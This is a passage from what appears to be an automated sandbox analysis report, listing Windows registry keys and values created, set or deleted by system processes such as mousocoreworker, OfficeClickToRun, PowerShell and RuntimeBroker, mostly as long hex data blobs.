| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceTicket = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb01000000af77a734f021914b86e7630dbdd433b70000000002000000000010660000000100002000000048c949f0736fb54d7eb44b1fdf1e759e79801f4b1d15df501ca99447ff2dbfa8000000000e8000000002000020000000efcd0220ff2828bb31ba9117f3073cea87cc5cf642712a13670239e0255f7a69b00300007005809ac1283330f3b4dbc44261417882780b26e2a54648c957e3b9ebb5968ffa7c636c3922b26b7fabfd7d41f17311386f9fb254f81f82e355bace5c76ef5905d488aef0a6b227ed41ee86f31fd1e3b89673ed41c8a2c6af434ac232b73908aa1bee676e071d86d4918fdadcf12d50453d79466dc985feec6b56b8243716284e1140f7b2dc9a2c8776e52736960dfdc673256ef1bd57d0a2bf0e50b7a6e94292aa891469a84d03e75a080832ea9dd1a3243c8e3e5a36dca6493e8a6c19c83a2a03e8ef5d3949a19855b7331f9dc06c0557f9eb9a8bf00d4184fcb3cc827cbd42086cb95c8d4a935385bca9e9486fed4e57ee1f31f893190db2b83f0e8650b3b120ef8f6daee82b60edce006c64498bc9d0a519d299e61fa2b4c56b6faaaea87c198cb609363627f96c5c7c0f7e0f1f01de9a89275c7329f3c6765bc8cd296d2d6c11aa9d50850843dd8267d9db7032e951c213324210a7c6abdf43bedecc5b2b6b78f9bef1880e1f896a6a9fff3489afb4407937357b2d3d2aa55e053e25d0f4b505e1e39e113a26cf3bc559c9f22477a02d2dcf619eb3921afac65359c768ecac5bcbfe64adc58093e7fa907c8d4ef0a906032161eecfc8d111f860bcf03b5277c6db7c60ca9276c44930770d05ae761d5ba166efd537b9f7e2460e825b898fbba710cc77f8ffd6b09092c704831e2ab963036d782eaf7becee2c630b19668b1c76e31157c3c96993a5b4a7aa215e350f21c28caec511b1232c826c999b87eafd8c68ae16dd4a15c88ab6477a4ed7744cdcbb48c771f4fad93a377d2f8a3347d5dcc15d6764306a144d6d8f7345f217ef6d82768905571bba1a219b9bb253fb8c10002526eb67dd5353298c4e107e1c8fe545bc9d105ec43f447aea3f6eb8a2c10d1121ae7ae36258721eaa105c8b408d91f4a28e56271792ae87bdf070024a2a76f2eb174401adc4f9d8cc3d98ac09eebbc4a891ae534ba40b5354a70b7b5b1a5436ad19c94bcd5d44d1df0a90839530d29235da61f9f487aee12b36969db5003939d97746d00b68ed7c105110f1c7ec3c26335a7054ab0709a1711591baf8d6003c1619295a1f72efe11797b6f3791136503bdbcd9968af4c3138b6ceab22ace81eea96e855192f00e65d40ef07dad3219ff0eee73b8a501b7fe65c7fe64f30bad2c550a00e5feaeba46d88140314735922a7a317b3e44e7414740e0253019961e764c3b17b1e24cf2a1471e342cac3858b6f082ecf43834d7c86a441e782295b8dd88b2df7b539b98086175546211d5dd6bbaefea271b11c7fbd11f6839a526caaf26fca654f0725aea3d186fd40000000e41a0d6a149a527228cd3537930dea242faa926b358d83295b385e0ef0a5673c4f888043a1034a7b2e70bf7ec6ac67a27b3f83747b2c36ba22bfbfd3183a71ff | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager\Peek | C:\Windows\System32\mousocoreworker.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={D750C836-6DA6-467B-A44A-33C88B5171B5}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceId = "00188010B00B94CE" | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1730345401" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\eefedfd4-3bcc-4c2b- = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b792a590-2885-4266- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c4f852f5-743e-4b8a- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\35fb5116-21cd-4f3f- = "\\\\?\\Volume{612D9CF5-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\3cc9a5f5fec19fa4cfca8c9a62ff6b4f1a7e8f2b45f9b870e7daa5e68d15431b" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\eefedfd4-3bcc-4c2b- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e1c74377-b88c-42ed- = 0114020000000000c0000000000000464c0000000114020000000000c000000000000046830000002000000064b56832452bdb0164b56832452bdb0164b56832452bdb01000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000005f59c71b2000383639376533306264643630333761626465623732656335366164336134613934393832396338333838343734343935613035336365303538343838626332370000b20009000400efbe5f59c71b5f59c71b2e000000000000000000000000000000000000000000000000009cb13c00380036003900370065003300300062006400640036003000330037006100620064006500620037003200650063003500360061006400330061003400610039003400390038003200390063003800330038003800340037003400340039003500610030003500330063006500300035003800340038003800620063003200370000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000e94cfe7f1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c38363937653330626464363033376162646562373265633536616433613461393439383239633833383834373434393561303533636530353834383862633237000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000006b626b776765626b000000000000000038f5ff7f6815af488ec1ee4e1e110c328de64cec9484ef11bdbf4a034d48373c38f5ff7f6815af488ec1ee4e1e110c328de64cec9484ef11bdbf4a034d48373cce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0032003000340035003500320031003100320032002d003500390030003200390034003400320033002d0033003400360035003600380030003200370034002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000f59c2d61000000000000d01200000000000000000000000000000000 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b792a590-2885-4266- = "\\\\?\\Volume{612D9CF5-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\8da9e4a28969d8de10781b4d0159df85e5793afe28e45c5917959c4955e8350b" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b0497cab-f484-413c- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\70b16702-30ba-4f69- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\70b16702-30ba-4f69- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\eefedfd4-3bcc-4c2b- = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000e7e13832452bdb01e7e13832452bdb01e7e13832452bdb01000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000005f59c71b2000336363396135663566656331396661346366636138633961363266663662346631613765386632623435663962383730653764616135653638643135343331620000b20009000400efbe5f59c71b5f59c71b2e0000000000000000000000000000000000000000000000000019856c00330063006300390061003500660035006600650063003100390066006100340063006600630061003800630039006100360032006600660036006200340066003100610037006500380066003200620034003500660039006200380037003000650037006400610061003500650036003800640031003500340033003100620000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000e94cfe7f1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c33636339613566356665633139666134636663613863396136326666366234663161376538663262343566396238373065376461613565363864313534333162000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000006b626b776765626b000000000000000038f5ff7f6815af488ec1ee4e1e110c328be64cec9484ef11bdbf4a034d48373c38f5ff7f6815af488ec1ee4e1e110c328be64cec9484ef11bdbf4a034d48373cce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0032003000340035003500320031003100320032002d003500390030003200390034003400320033002d0033003400360035003600380030003200370034002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000f59c2d61000000000000d01200000000000000000000000000000000 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\13ce8255-4122-4560- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9d962160-4e55-48da- = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\35fb5116-21cd-4f3f- = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\eefedfd4-3bcc-4c2b- = "\\\\?\\Volume{612D9CF5-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\3cc9a5f5fec19fa4cfca8c9a62ff6b4f1a7e8f2b45f9b870e7daa5e68d15431b" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b792a590-2885-4266- = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e1c74377-b88c-42ed- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c4f852f5-743e-4b8a- = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3d33358c-291a-4112- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e046c724-dba3-4ccf- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b0497cab-f484-413c- = "\\\\?\\Volume{612D9CF5-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\4c367a787e45e8c0925f73cea7c418e5e8dafb2501d5efda2f09a9254577958c" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b0497cab-f484-413c- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\70b16702-30ba-4f69- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\70b16702-30ba-4f69- = "\\\\?\\Volume{612D9CF5-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\1b6b994d653423a674aeb2213068072d7fbd3b2de7511b3d75fe58d953901860" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7592bee8-c408-4e73- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3d33358c-291a-4112- = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e1c74377-b88c-42ed- = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b792a590-2885-4266- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b0497cab-f484-413c- = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000004d437932452bdb014d437932452bdb014d437932452bdb01000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000005f59c71b2000346333363761373837653435653863303932356637336365613763343138653565386461666232353031643565666461326630396139323534353737393538630000b20009000400efbe5f59c71b5f59c71b2e00000000000000000000000000000000000000000000000000b3232c00340063003300360037006100370038003700650034003500650038006300300039003200350066003700330063006500610037006300340031003800650035006500380064006100660062003200350030003100640035006500660064006100320066003000390061003900320035003400350037003700390035003800630000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000e94cfe7f1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c34633336376137383765343565386330393235663733636561376334313865356538646166623235303164356566646132663039613932353435373739353863000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000006b626b776765626b000000000000000038f5ff7f6815af488ec1ee